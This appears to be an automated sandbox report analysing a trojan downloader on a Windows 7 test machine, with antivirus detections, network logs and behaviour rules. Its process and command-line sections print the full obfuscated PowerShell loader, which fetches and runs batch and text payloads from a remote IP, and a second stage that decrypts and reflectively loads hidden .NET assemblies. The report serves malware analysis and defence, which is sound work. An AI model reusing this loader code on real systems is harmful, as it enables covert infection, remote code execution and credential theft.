Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 21, 2024, 12:44 p.m. | April 21, 2024, 12:46 p.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE 
@(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
2640-
notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt
2812 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 
6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
3052 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
604
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.128 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.128:7287 -> 192.168.56.101:49165 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Roaming\15.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE 
@(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH; |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS 
$iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH; |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\15.bat" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 
6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); " |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 108 Content-Type: text/plain Connection:close ì볼루ì ë°°í ê²ìì´ë¦ ë°°í ë´ì íì°¨ ìê° ê¸ì¡ ê²°ê³¼ 미ì§ê¸ê¸ì¡ ì§ê¸ì ê¸ì¡ |
Data received | Content-Length: 62382 Content-Type: application/octet-stream Connection:close @echo off set "gwAVRA=seWiBDht aWiBDhPiBWiBDh=1WiBDh &WiBDh&WiBDh sWiBDhtaWiBDhrt WiBDh"WiBDh" WiBDh/mWiBDhinWiBDh WiBDh" set "CMXyhD=&WiBDh& eWiBDhxiWiBDhtWiBDh" set "pEXfDe=noWiBDht WiBDhdeWiBDhfWiBDhiWiBDhneWiBDhd aWiBDhPWiBDhiBWiBDh if %pEXfDe:WiBDh=% (%gwAVRA:WiBDh=%%0 %CMXyhD:WiBDh=%) ::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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data sent | GET /Note.txt HTTP/1.1 Host: 193.222.96.128:7287 Connection: Keep-Alive |
Data sent | GET /15.bat HTTP/1.1 Host: 193.222.96.128:7287 |
description | Create a Windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.128 |
file | C:\Users\test22\AppData\Roaming\Note.txt |
file | C:\Users\test22\AppData\Roaming\15.bat |
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\15.bat | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\Note.txt | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\15.bat" |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=86) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\notepad.exe |